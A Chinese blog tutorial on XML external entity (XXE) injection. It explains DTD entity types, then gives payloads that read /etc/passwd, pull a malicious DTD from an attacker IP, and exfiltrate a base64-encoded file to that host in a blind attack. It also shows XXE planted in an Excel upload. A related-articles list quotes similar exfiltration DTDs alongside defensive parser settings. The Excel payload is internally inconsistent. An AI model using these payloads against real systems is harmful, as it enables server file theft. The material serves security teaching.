XML外部实体注入

最新推荐文章于 2025-04-30 20:01:26 发布
原创 最新推荐文章于 2025-04-30 20:01:26 发布
· 1.9k 阅读 · 20 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xml #网络安全 #web安全

1.DTD实体及引用

DTD(文档类型定义)是一种用于定义XML文档结构和元素约束的方法。它可以描述一个XML文档的元素、属性、实体、注释等,从而规定了文档的结构和语法规则。DTD 通常是一个单独的文件,可以被多个XML文档所共享。

而在DTD中,实体是一种可以被引用的数据类型,它可以用来代替特定的字符,字符串,符号等,从而使DTD更加灵活和易于维护

(1)内部实体

格式:<!ENTITY 实体名称 "实体的值">

例子:

<!DOCTYPE note [

  <!ENTITY author "John Smith">

]>

<user><username>&author;</username><password>1</password></user>

在这个例子中,定义了一个名为author的内部实体,它的实际内容是John Smith,在xml文档中,通过&author进行引用,并将其替换为实际内容

(2)外部实体

格式:<!ENTITY 实体名称 SYSTEM "URI">

例子:

<!DOCTYPE note [

  <!ENTITY author SYSTEM "author.txt">

]>

<note>

  <to>Tove</to>

  <from>Jani</from>

  <heading>Reminder</heading>

  <body>Hello &author;!</body>

</note>

在这个例子中,定义了一个名为“author”的外部实体,它在一个名为“author.txt”的文件中定义。在XML文档中,通过使用“&author”来引用该实体,并将其替换为“author.txt”文件中的实际内容。

(3)通用实体

格式:<!ENTITY entity-name "entity-value">

其中,entity-name是实体的名称,entity-value 是实体的值。通用实体可以在XML文档中任何位置用和使用,使用实体引用的方式引用该实体。

(4)参数实体

格式:<!ENTITY % entity-name "entity-value">

其中,entity-name是参数实体的名称,entity-value 是参数实体的值。参数实体只能在DTD中引用和使用,使用%符号和实体名称的方式引用该实体

例子:

<?xml version="1.0" encoding="UTF-8" ?>

<!DOCTYPE message [

<!ENTITY  %  remote SYSTEM "http://IP:6666">

%remote;

]>

<message></message>

注:

A.使用% 实体名(这里面空格不能少)在DTD 中定义,并且只能在DTD 中使用

% 实体名;引用。

B.只有在DTD文件中,参数实体的声明才能引用其他实体。

C.和通用实体一样,参数实体也可以外部引用。

D.特殊符号

在XML中,一些字符拥有特殊的意义,如果把这些直接放进XML元素中会产生错误。比如下面这个插入了“<”符号,解析器会把它当作新元素的开始,就会产生错误,为了避免这个错误,我们可以用实体引用来替代这些特殊的字符。比如在XML中有5个预定义的实体引用:

2.XML外部实体注入

(1)原理

利用了XML解析器中的实体功能,向目标应用程序注入恶意实体。攻击者构造一个恶意XML文档,并在其中插入一个外部实体引用,引用指向一个攻击者控制的文件或URL。当目标应用程序解析恶意XML文档时,它会尝试加载外部实体,并执行其中包含的代码或读取其中包含的数据。

(2)构建方法

A.直接通过DTD+外部实体声明

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<user><username>&xxe;</username><password>1234</password></user>

B.通过DTD文档引入外部DTD文档,再引入外部实体

<?xml version="1.0"?>

<!DOCTYPE a SYSTEM "http://192.168.169.1/evil.dtd">

<user><username>&xxe;</username><password>1234</password></user>

Evil.dtd文件内容:

<!ENTITY xxe SYSTEM "file:///etc/passwd">

C.无回显

按B中方法进行利用发现没有回显,那么就需要用blind xxe漏洞去利用

<!DOCTYPE convert [

<!ENTITY % remote SYSTEM "http://192.168.169.1:1234/test.dtd">

%remote;%int;%send;

]>

<user><username>1</username><password>2ad</password></user>

Test.dtd:

<!ENTITY %file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/flag">

<!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.169.1:1234/?p=%file;'>">

(3)EXCEL文档XXE

实际上,现代Excel文件实际上只是XML文档的zip文件。这称为0fice Open XML格式或00XML。许多应用程序允许上传文件。有些处理内部数据并采取相应的操作,这几乎肯定需要解析XML。如果解析器未安全配置,则XXE几乎是不可避免的。

<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "http://xxx.com/" >]>

<name>&GVI;</name>

首先新建xlsx文件,然后将其后缀修改为.zip,再将该zip文件解压,打开[Content_Types].xml把测试代码放到第二、三行

然后将其后缀改为xlsx再上传即可

HXYR
关注
利用 XML 外部实体注入
blacklordking的博客
06-21 484
在现实生活中大量存在有关系的数据,XML语言出现的根本目标在于描述在现实生活中经常出现的有关系的数据。在XML语言中,它允许用户自定义标签。一个标签用于描述一段数据;一个标签可分为开始标签和结束标签,在开始标签和结束标签之间,又可以使用其它标签描述其它数据,以此来实现数据关系的描述。(在XML中,用ELEMENT表示元素,用ENTITY表示实体)
XXE(xml外部实体注入
今天也要加油鸭
03-13 2245
一、什么是xml 二、漏洞原理 三、攻击方式 四、危害 五、如何防御
34-XXE(XML外部实体注入
XLbb的博客
05-19 1194
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
浅析XML注入
最新发布
m0_67511404的博客
04-30 643
浅析XML注入
Web Hacking 101 中文版 十四、XML 外部实体注入(一)
热门推荐
龙哥盟
03-25 3万+
十四、XML 外部实体注入 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 XML 外部实体(XXE)漏洞涉及利用应用解析 XML 输入的方式,更具体来说,应用程序处理输入中外部实体的包含方式。为了完全理解理解如何利用,以及他的潜力。我觉得我们最好首先理解什么是 XML外部实体。元语言是用于描述其它语言的语言,这就是 XML。它在 H
XML 外部实体注入
2201_75370376的博客
06-22 1202
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
网络安全-XXE(XML外部实体注入)原理、攻击及防御_c# 如何防止xml外部实体注入
2401_84266286的博客
05-04 719
XML外部实体注入(XML External Entity,为什么不取首字母呢…),简称XXE漏洞。
网络安全-XXE(XML外部实体注入)原理、攻击及防御_c# 如何防止xml外部实体注入(1)
2401_84544752的博客
05-14 472
XML外部实体注入(XML External Entity,为什么不取首字母呢…),简称XXE漏洞。
用友U8 Cloud smartweb2.RPC.d XML外部实体注入漏洞
Keepb1ue的博客
01-05 1638
用友U8cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型、集团型企业,提供企业级云ERP整体解决方案。它包含ERP的各项应用,包括iUAP、财务会计、iUFO cloud、供应链与质量管理、人力资源、生产制造、管理会计、资产管理,以及电商通、U会员、U订货、友云采、友报账、友空间、友人才等用友云服务。
XML外部实体注入(XXE)
web1的博客
09-08 579
关键利用点:外部实体 XML是什么? XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的义的 xxe 实体进行了引用 相关实验 1、利用外部实体来检索文件 1.1 访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。 1.2 在 XML 声明和stockCheck元素之间插入以下外部实体定义: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "fil
XML实体注入
weixin_55190422的博客
09-25 551
XML实体注入 首先介绍下基础知识把 XML大体格式如下: 接下来我以一个题目讲解 首先题目已经告诉我们了这是一道关于XML的题目 那么怎么做呢 我们打开靶机发现是一个登录界面 我们审查网页源代码 发现里面还有个dologin.php类似于PHP源码。所以我们考虑BP抓包发现是个XXE漏洞Accept: application/xml, text/xml, */*; q=0.01 X-Requested-With: XMLHttpRequest 我们用这个格式payl
网络安全】XXE--XML外部实体注入
边缘拼命划水的小陈
04-24 1415
XML外部实体注入XML EXTERNAL ENTITY)简称XXE漏洞,概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
网络安全零基础入门】之XML外部实体注入(非常详细)建议收藏!
白帽阿叁的博客
10-30 805
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
xml实体注入
HoAd'blog
02-01 489
xml实体注入 XXE漏洞即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 - XML被设计为传输和存储数据,其焦点是数据的内容。 - HTML被设计用来显示数据,其焦点是数据的外观。 &lt &gt &amp &apos &
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5598
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
xml外部实体注入(XXE)
songbai220
12-10 378
XXE(xml外部实体注入) XML External Entity XXE介绍 XXE原理 建立*.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.0.105:8080?p=%file;'>"> 运维人
深入浅出带你了解XML实体注入
qq_44005305的博客
01-02 1147
Xml外部实体注入漏洞(XML External Entity Injection)简称XXE,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可以构造加载恶意外部文件,进而通过恶意外部文件对服务器进行攻击。今天比较详细的讲了XXE漏洞的原理以及应用方法,有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。## 题外话初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。
XXE详解-----XML实体注入
习惯积淀的博客
04-29 1804
XXE-----XML外部实体注入 XML简介 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML文档的构建模块 所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成: 元素 属性 实体 PCDATA CDATA ...
xml外部实体注入
04-03
### XXE漏洞原理 XML外部实体注入(XXE,XML External Entity Injection)是一种针对XML解析器的安全漏洞。当应用程序使用不受信任的数据作为输入并将其传递给XML解析器时,如果该解析器未正确配置,则可能允许攻击者定义恶意的外部实体[^1]。 #### 原理概述 XML支持通过`DOCTYPE`声明来引用外部实体文件。这些外部实体可以指向本地文件系统中的资源或远程URL。一旦攻击者能够控制XML输入的内容,他们就可以利用此功能访问敏感信息、执行拒绝服务攻击甚至发起服务器端请求伪造(SSRF)攻击[^4]。 例如,以下是一个简单的XXE攻击示例: ```xml <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo> ``` 上述代码尝试读取目标机器上的`/etc/passwd`文件内容,并将其嵌入到响应中返回给攻击者[^3]。 --- ### 防护措施 为了有效防止XXE攻击的发生,可以从以下几个方面入手实施防护策略: #### 1. **禁用外部实体** 大多数现代XML库都提供了选项用于关闭对外部实体的支持。这是最直接也是最重要的防御方式之一。例如,在libxml2版本2.9.0之后,默认情况下不会自动加载任何外部实体,除非显式启用这一行为[^2]。 对于Java环境下的SAXParserFactory实例化过程来说,可以通过设置特定属性来强化安全性: ```java DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); dbf.setFeature("http://xml.org/sax/features/external-general-entities", false); dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false); ``` 以上代码片段展示了如何通过调整工厂对象的功能特性以杜绝潜在风险点的存在。 #### 2. **升级依赖组件** 确保所使用的第三方库始终处于最新稳定状态非常重要。因为很多旧版软件可能存在已知漏洞而未能及时修复的情况。比如前面提到过的libxml2项目,在其后续迭代过程中逐步增强了关于安全性的考量。 另外值得注意的是,除了单纯依靠更新之外还需要关注官方发布的补丁说明以及迁移指南等内容以便顺利完成过渡工作而不影响现有业务逻辑正常运转。 #### 3. **验证用户提交数据的有效性和合法性** 无论何时接收到来自客户端或其他不可信源发送过来的信息之前都应该先经过严格校验流程再进一步处理下去 。这不仅限于单纯的字符串匹配操作还包括但不限于长度限制检查、字符集范围界定等方面的工作。 #### 4. **采用更安全替代方案** 考虑完全放弃传统基于DOM/SAX模型的传统做法转而选用JSON等形式表达结构化的数据交换需求不失为一种可行的选择方向。毕竟后者天生不具备类似的弱点特征从而大大降低了遭受此类威胁的可能性。 --- ### 结论 综上所述,通过对XXE漏洞形成机制的理解我们可以采取多种有效的预防手段加以应对,其中包括但不限于禁用不必要的功能性模块如外部实体引用能力;定期审查维护相关技术栈保持与时俱进的态度积极拥抱新特性带来的改进成果等等。只有这样才能够最大程度保障信息系统免受未知隐患侵害的同时持续提供高质量的服务体验给最终使用者群体带来价值最大化的效果体现出来。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值